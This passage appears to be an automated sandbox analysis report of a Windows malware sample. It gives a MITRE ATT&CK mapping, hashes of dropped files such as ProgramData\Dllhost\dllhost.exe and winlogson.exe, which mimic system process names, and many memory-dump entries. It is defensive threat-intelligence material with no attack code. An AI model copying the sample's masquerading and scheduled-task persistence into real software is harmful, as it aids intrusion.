- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe
Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe
Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json
Filesize
322B

MD5
6b31f8231eb70dd57070ef97f691f4d1

SHA1
f33f416824e59f376dad28dee9a81de2ac93df35

SHA256
60bfba5533560797b4a42f0e2b20ff252f71492a9c0b3750731fea80ab61214d

SHA512
1b45a128a5a600d3732813155e196fe50887119df8e0da5d2138d78025273fd98d079ffb1c2fe14a115627938f93bf0b42f7cf5139021ee1fd2c1f69b3968c92

Download Submit
C:\ProgramData\HostData\logs.uce
Filesize
346B

MD5
7cd54a5ac8dd28cdf11218402e9bd701

SHA1
3a869c67c6a31e6186addf3e45d6638953c1670a

SHA256
5de14e8d90dfe5f81ffe5c0d80958ae5c2fb691b6fe88e8a085d9b7b69be57f7

SHA512
bef716dd874f1c17a8b6eed4aa770e7743f7c35ab6635d672dd51a4c6c641beed44f361ea982075c952f18960de9d39313ac789bc3869fb9f73132f74c3d777f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
42352a7aa788ddd8928bfca73b18d100

SHA1
550e3fd88f0afbf19c2fca917365df3c0c29a85e

SHA256
f6d6224131234cff584f6a22ffeffdf239bff755d026ff4646067ebf8b4621d1

SHA512
c5894508e186a5f50a8345cf329fa919efb699a0302cdd74e1d93610fc5759d138e1f9dbbff6b570dadce98f0892492d308e12a7931555b205a3507a1b898e31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
f00ab92ea3a0f7b9289ccd99267d1b95

SHA1
68fc3bd2556df08bfcdc1d55c36946ed19a67104

SHA256
f1749cafb63b24dff555f0df02143ad37f4779764df7f523c4e94e225eed9bff

SHA512
e5e916901723eab4315045752934e1e5252143b18ccca0b42f8ee018d832625d69d80baa42c98d00c25ce9bfd96b1551d376d6a04b6723f2ab1ddfecbf5d8257

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
189eea870f644f4ddb4ead8877050543

SHA1
b2b04580a2bcef59ab4d1e7c4764443e63b4403d

SHA256
1ed971d5bd6499803cc03e756cab1b8073234de531640907204e5befea30f586

SHA512
c7ccf1b441688d151dd01e486ce0bb90bd3f2543b35c9cdcd23ac81691e31fafda9f31dc74727a02764b45b9e9c7f81b997a7d459ae3d63ebdbf40aefa931089

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
9964f0422b7c522e6d5dda6604d587f4

SHA1
1cf16ac0d4abcf3c68f86b95b5311ccf39e27c34

SHA256
cbe3508089484e56933336e73caecd0fa73728067e1a786028fa375092b867c4

SHA512
63ebdddf9c1c40fc35294f509fe5b19a30a68e0a63f0d04cc9f7b5fb3395998f2b27bb03e2d504ab9337d9da5db3994571c18821916d4b521517ec35ac5df060

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
96bfb8f9d8f93349b13d1c156da8f254

SHA1
dc6fb88962c5b102bdbc25227e602fd973d47d84

SHA256
6710469684a7e47c508fb07c583b25e88503a28b6ff7d7ff9e2c3d375567af65

SHA512
ccaaf417812ea1bbe37cd835ec09eb920af9baf679d7c04c1afa37ea24e32bb5f8add219886a0cd23dca292773d97b9e2139f8c4c1362c096b277e5c7f8f67c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
65a3a0ff9f66aabeb0058cb7d51b5cad

SHA1
569ed243c868964b26afc16720b32aeccb2d78f3

SHA256
40335e52849349fb56cc9723df9431b1a3a06961c31cd5cc7c6e2569f9770042

SHA512
9f225165849c6ffc4a6f5a1aaacfb0a95b355d2e0a88af4d0f7d052b9fe16e1c626fbf45829d82096a31640a9f9275a138a1c0ea0a962736c3a25f2b676a919f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
230b87746ac07459ca78a85bf16f96f6

SHA1
90fb6263f0167436ff22ed2b8d72420f74a6c21a

SHA256
8732098de56da740342e6a9c5a23df08e1feb5ef3dfee8eb276e9cd0ea829ca4

SHA512
2084023306fcc5b0c7dda041c7e8183fafd48f17ca92c4f6b86407fdf79910be612d97fd64d408a2d8b7bd13c4982ea555ef460e4a9e6e11a940887314c67de9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
8fb8d68109916c7ef16a4fa255e4004b

SHA1
313779b7777f429eed9265d19538a8bb4143a432

SHA256
fd0a15a13ade93d198e81989233d638d64126361119a2ec79e48b74ebf27ec49

SHA512
88ac2c87be95e2b74b40279ff7ef4ba90ed8b270fed9da622c62987aabcffbc9ab11033bd14380ef7037a12fe7686a73d8ed22d3fcd0e5372412d72bf5f78878

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
0cba2b38a07daf4c71e67bc814c559e4

SHA1
a90d2f707ccb3b653b36b3021c8ace63af21d181

SHA256
ce319f2fe49a68d0d252387713c552afc2742a1dc8f19e91ebf43452c5406d66

SHA512
3c0211ca8dd4dcd95d511f010ffe192c2f1c41fe3777fbf13d6cb4cded1da7c6b4a490f2b369bcea0af05f54837fc1d8868f7fefca4b4cd2909d8720f03129c9

Download Submit
memory/96-707-0x0000000000000000-mapping.dmp

Download
memory/164-711-0x0000000000000000-mapping.dmp

Download
memory/212-708-0x0000000000000000-mapping.dmp

Download
memory/304-2760-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/304-2756-0x0000000000000000-mapping.dmp

Download
memory/776-615-0x0000000000000000-mapping.dmp

Download
memory/812-736-0x0000000000000000-mapping.dmp

Download
memory/912-733-0x0000000000000000-mapping.dmp

Download
memory/1020-2747-0x0000000000000000-mapping.dmp

Download
memory/1288-590-0x0000000000000000-mapping.dmp

Download
memory/1700-683-0x0000000000000000-mapping.dmp

Download
memory/1708-603-0x0000000000000000-mapping.dmp

Download
memory/1708-2426-0x0000000000000000-mapping.dmp

Download
memory/1756-692-0x0000000000000000-mapping.dmp

Download
memory/1756-1347-0x0000000008E30000-0x0000000008ED5000-memory.dmp

Filesize
660KB

Download
memory/1756-1245-0x0000000007C10000-0x0000000007C5B000-memory.dmp

Filesize
300KB

Download
memory/1804-695-0x0000000000000000-mapping.dmp

Download
memory/1856-572-0x0000000000000000-mapping.dmp

Download
memory/1888-150-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-154-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-162-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-163-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-164-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-165-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-166-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-167-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-168-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-169-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-170-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-171-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-172-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-173-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-175-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-176-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-178-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-179-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-180-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-181-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-182-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-183-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-184-0x000000000B2A0000-0x000000000B79E000-memory.dmp

Filesize
5.0MB

Download
memory/1888-185-0x000000000AEA0000-0x000000000AF32000-memory.dmp

Filesize
584KB

Download
memory/1888-186-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-187-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-188-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-201-0x000000000AE30000-0x000000000AE3A000-memory.dmp

Filesize
40KB

Download
memory/1888-202-0x000000000B0A0000-0x000000000B106000-memory.dmp

Filesize
408KB

Download
memory/1888-160-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-159-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-158-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-157-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-156-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-155-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-161-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-141-0x0000000000170000-0x0000000000198000-memory.dmp

Filesize
160KB

Download
memory/1888-153-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-152-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-151-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-149-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-148-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-147-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1888-146-0x000000000019203E-mapping.dmp

Download
memory/2312-715-0x0000000000000000-mapping.dmp

Download
memory/2324-570-0x0000000000000000-mapping.dmp

Download
memory/2472-759-0x0000000000000000-mapping.dmp

Download
memory/2672-1014-0x0000000000000000-mapping.dmp

Download
memory/2796-130-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-128-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-136-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-135-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-134-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-133-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-132-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-131-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-120-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-138-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-129-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-137-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-127-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-140-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-126-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-125-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-124-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-123-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-122-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-139-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-121-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2872-738-0x0000000000000000-mapping.dmp

Download
memory/3340-713-0x0000000000000000-mapping.dmp

Download
memory/3616-282-0x0000000007AF0000-0x0000000007B0C000-memory.dmp

Filesize
112KB

Download
memory/3616-278-0x00000000079C0000-0x0000000007A26000-memory.dmp

Filesize
408KB

Download
memory/3616-217-0x0000000000000000-mapping.dmp

Download
memory/3616-253-0x0000000004AD0000-0x0000000004B06000-memory.dmp

Filesize
216KB

Download
memory/3616-258-0x0000000007230000-0x0000000007858000-memory.dmp

Filesize
6.2MB

Download
memory/3616-277-0x0000000007980000-0x00000000079A2000-memory.dmp

Filesize
136KB

Download
memory/3616-279-0x0000000007C80000-0x0000000007FD0000-memory.dmp

Filesize
3.3MB

Download
memory/3616-283-0x00000000084D0000-0x000000000851B000-memory.dmp

Filesize
300KB

Download
memory/3616-290-0x0000000008230000-0x00000000082A6000-memory.dmp

Filesize
472KB

Download
memory/3616-326-0x0000000009350000-0x0000000009383000-memory.dmp

Filesize
204KB

Download
memory/3616-327-0x0000000009390000-0x00000000093AE000-memory.dmp

Filesize
120KB

Download
memory/3616-336-0x00000000093B0000-0x0000000009455000-memory.dmp

Filesize
660KB

Download
memory/3616-340-0x0000000009670000-0x0000000009704000-memory.dmp

Filesize
592KB

Download
memory/3616-543-0x0000000006E80000-0x0000000006E9A000-memory.dmp

Filesize
104KB

Download
memory/3616-548-0x0000000006E70000-0x0000000006E78000-memory.dmp

Filesize
32KB

Download
memory/3632-596-0x0000000000000000-mapping.dmp

Download
memory/3756-2741-0x0000000000000000-mapping.dmp

Download
memory/3776-211-0x0000000000000000-mapping.dmp

Download
memory/3904-727-0x0000000000000000-mapping.dmp

Download
memory/4092-567-0x0000000000000000-mapping.dmp

Download
memory/4092-693-0x0000000000540000-0x0000000000556000-memory.dmp

Filesize
88KB

Download
memory/4220-634-0x0000000000000000-mapping.dmp

Download
memory/4256-621-0x0000000000000000-mapping.dmp

Download
memory/4284-575-0x0000000000000000-mapping.dmp

Download
memory/4364-1116-0x0000000000000000-mapping.dmp

Download
memory/4380-579-0x0000000000000000-mapping.dmp

Download
memory/4512-1227-0x0000000007E20000-0x0000000008170000-memory.dmp

Filesize
3.3MB

Download
memory/4512-726-0x0000000000000000-mapping.dmp

Download
memory/4728-641-0x0000000000000000-mapping.dmp

Download
memory/4840-2733-0x0000000000000000-mapping.dmp

Download
memory/4928-2727-0x0000000000000000-mapping.dmp

Download
memory/4968-609-0x0000000000000000-mapping.dmp

Download
memory/5032-584-0x0000000000000000-mapping.dmp

Download
memory/5052-1287-0x0000000000000000-mapping.dmp

Download
memory/5060-1244-0x0000000000000000-mapping.dmp

Download
memory/5088-1140-0x0000000000000000-mapping.dmp

Download
memory/5096-627-0x0000000000000000-mapping.dmp

Download